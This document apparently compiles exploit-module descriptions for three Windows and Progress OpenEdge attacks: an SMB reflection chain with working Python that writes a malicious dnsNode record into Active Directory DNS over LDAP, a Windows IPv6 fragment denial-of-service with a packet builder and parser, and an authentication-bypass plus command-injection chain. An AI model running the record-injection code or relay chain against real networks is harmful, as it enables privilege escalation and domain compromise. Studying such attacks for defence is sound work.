This module exploits an access control issue in Windows SMB clients to deploy a remote agent with SYSTEM privileges through a multi-stage attack chain:
1. DNS injection: adds a malicious DNS record named 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' to the domain controller's AD-integrated DNS zone via LDAP, pointing at the attacker's IP address.
2. NTLM relay: starts an ntlmrelayx server that waits for the victim's SMB authentication attempts and relays them to install an agent with SYSTEM privileges on the target system.
3. RPC coercion: forces the victim system to authenticate to the attacker-controlled DNS name using RPC coercion techniques, so that its SMB client connects to the relay server from step 2.
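The record in step 1 is written as a dnsNode object whose dnsRecord attribute holds a binary DNS_RPC_RECORD (MS-DNSP). The Python below is an added example, not the module's own code: it serialises an A record in that format, parses it back for verification, and assembles the LDAP add request. The zone name, domain DN, attacker IP and the ldap3-style connection object are assumptions; the record name is the one the module uses.

```python
import struct
from ipaddress import IPv4Address

# Added example (not the module's own code). Builds the value written into the
# dnsRecord attribute of a new dnsNode when the A record is injected over LDAP.
# Layout follows DNS_RPC_RECORD in MS-DNSP: every field is little-endian except
# TtlSeconds, which Windows stores big-endian. Zone, DN and IP are assumptions.

DNS_TYPE_A = 0x0001
RANK_ZONE = 0xF0        # authoritative record that lives in the zone itself
RECORD_VERSION = 5      # fixed by the specification

# The record name the module registers; it resolves to the attacker's host.
RECORD_NAME = "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"


def build_a_record(ip: str, ttl: int = 180, serial: int = 1) -> bytes:
    """Serialise an A record pointing at `ip` in dnsRecord wire format."""
    data = IPv4Address(ip).packed               # 4 raw address bytes
    header = struct.pack(
        "<HHBBHL",
        len(data),          # DataLength
        DNS_TYPE_A,         # Type
        RECORD_VERSION,     # Version
        RANK_ZONE,          # Rank
        0,                  # Flags
        serial,             # Serial (zone serial at which the record was added)
    )
    ttl_be = struct.pack(">L", ttl)             # TtlSeconds, big-endian
    tail = struct.pack("<LL", 0, 0)             # Reserved, TimeStamp (0 = static, never scavenged)
    return header + ttl_be + tail + data


def parse_a_record(blob: bytes) -> dict:
    """Decode a dnsRecord blob so the encoder can be checked round-trip."""
    data_len, rtype, version, rank, flags, serial = struct.unpack_from("<HHBBHL", blob, 0)
    (ttl,) = struct.unpack_from(">L", blob, 12)
    _reserved, timestamp = struct.unpack_from("<LL", blob, 16)
    data = blob[24:24 + data_len]
    if rtype != DNS_TYPE_A or data_len != 4:
        raise ValueError("not an A record")
    return {
        "type": rtype, "version": version, "rank": rank, "flags": flags,
        "serial": serial, "ttl": ttl, "timestamp": timestamp,
        "ip": str(IPv4Address(data)),
    }


def dns_node_add_request(record_name: str, zone: str, domain_dn: str, attacker_ip: str):
    """Return the (dn, objectClass list, attributes) triple for the LDAP add.

    AD-integrated zones live under CN=MicrosoftDNS in the DomainDnsZones
    partition; each record name is one dnsNode child of the zone object.
    """
    dn = f"DC={record_name},DC={zone},CN=MicrosoftDNS,DC=DomainDnsZones,{domain_dn}"
    attributes = {
        "dnsRecord": [build_a_record(attacker_ip)],
        "dNSTombstoned": False,
    }
    return dn, ["top", "dnsNode"], attributes


def inject_record(conn, zone: str, domain_dn: str, attacker_ip: str,
                  record_name: str = RECORD_NAME) -> bool:
    """Perform the add on an authenticated connection.

    `conn` is assumed to expose ldap3's Connection.add(dn, object_class,
    attributes) signature. By default authenticated domain users may create
    child objects under the zone, so this step needs no elevated rights.
    """
    dn, classes, attributes = dns_node_add_request(record_name, zone, domain_dn, attacker_ip)
    return conn.add(dn, classes, attributes)
```

The TimeStamp of 0 matters: a non-zero value marks the record as dynamic and lets DNS scavenging remove it, while 0 keeps it in place until the attacker deletes the dnsNode. Expect DNS replication and client caching to add a delay before the coerced victim actually resolves the new name.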
A memory corruption vulnerability in the Windows IPv6 stack allows remote denial of service via maliciously crafted IPv6 Fragment Header packets. Because the fault occurs in kernel code, a successful attack crashes the whole system rather than a single process. Exploitation requires no authentication or user interaction; an attacker need only send the specially crafted packets to a vulnerable host. All Windows versions with IPv6 enabled are affected, and IPv6 is enabled by default on Windows 10 and later.
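To make the attack surface concrete, here is an added example (not from the advisory) that parses an IPv6 packet whose first extension header is a Fragment Header and applies the sanity checks RFC 8200 imposes on fragments. The checks are generic; the advisory gives no detail of which malformed fragment triggers the bug, so nothing here claims to detect it. Addresses and payloads are constructed test input.

```python
import struct
from dataclasses import dataclass
from ipaddress import IPv6Address

# Added example, not from the advisory. Parses IPv6 header + Fragment Header
# and flags the fragment conditions RFC 8200 says a receiver must reject.
# The specific malformed fragment behind the kernel bug is not described in
# the advisory, so these checks are generic protocol hygiene only.

IPV6_HDR_LEN = 40
NH_FRAGMENT = 44        # Next Header value that introduces a Fragment Header
NH_ICMPV6 = 58
MAX_IPV6_PAYLOAD = 65535


@dataclass
class Fragment:
    next_header: int    # protocol of the reassembled payload
    offset: int         # fragment offset in 8-octet units (13-bit field)
    more: bool          # M flag: more fragments follow
    ident: int          # 32-bit Identification shared by all fragments of a packet
    payload_len: int    # bytes that follow the Fragment Header


def build_fragment(src: str, dst: str, ident: int, offset: int, more: bool,
                   payload: bytes, next_header: int = NH_ICMPV6) -> bytes:
    """Construct IPv6 header + Fragment Header + payload (constructed test input)."""
    if not 0 <= offset < 2 ** 13:
        raise ValueError("fragment offset is a 13-bit field")
    frag_hdr = struct.pack("!BBHI", next_header, 0, (offset << 3) | int(more), ident)
    payload_len = len(frag_hdr) + len(payload)
    ip6 = (struct.pack("!IHBB", 6 << 28, payload_len, NH_FRAGMENT, 64)
           + IPv6Address(src).packed + IPv6Address(dst).packed)
    return ip6 + frag_hdr + payload


def parse_fragment(pkt: bytes) -> Fragment:
    """Decode the fixed IPv6 header and the Fragment Header that follows it."""
    if len(pkt) < IPV6_HDR_LEN + 8:
        raise ValueError("packet too short for IPv6 header + Fragment Header")
    vtf, payload_len, nh, _hop = struct.unpack_from("!IHBB", pkt, 0)
    if vtf >> 28 != 6:
        raise ValueError("not an IPv6 packet")
    if nh != NH_FRAGMENT:
        raise ValueError("first extension header is not a Fragment Header")
    if payload_len != len(pkt) - IPV6_HDR_LEN:
        raise ValueError("Payload Length does not match captured length")
    fnh, _res, off_flags, ident = struct.unpack_from("!BBHI", pkt, IPV6_HDR_LEN)
    return Fragment(fnh, off_flags >> 3, bool(off_flags & 1), ident, payload_len - 8)


def fragment_anomalies(frag: Fragment) -> list:
    """Return RFC 8200 violations plus the atomic-fragment case (empty if clean)."""
    issues = []
    if frag.more and frag.payload_len % 8:
        # Every fragment except the last must carry a multiple of 8 octets.
        issues.append("non-final fragment length not a multiple of 8")
    if frag.offset * 8 + frag.payload_len > MAX_IPV6_PAYLOAD:
        # Offset plus length would push the reassembled payload past the maximum.
        issues.append("reassembled length exceeds 65535")
    if frag.payload_len == 0:
        issues.append("empty fragment")
    if frag.offset == 0 and not frag.more:
        # Legal (RFC 6946) but worth surfacing: a single-fragment "atomic" packet.
        issues.append("atomic fragment (offset 0, M=0; RFC 6946)")
    return issues
```

A fragment that passes these checks can still be hostile, since a reassembly bug depends on how the stack combines many fragments (overlaps, gaps, repeated identifications) rather than on any one header. Running the parser over captured traffic is useful mainly to see how much fragmented IPv6 a host legitimately receives before deciding whether to filter it at the edge.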
CVE-2025-7388 is an OS command injection vulnerability in Progress OpenEdge that allows authenticated remote attackers to execute system commands in the context of NT AUTHORITY\SYSTEM. This module can also use CVE-2024-1403, an authentication bypass vulnerability that grants access to the adminServer classes, and chain it with the CVE-2025-7388 command injection so that no valid credentials are required.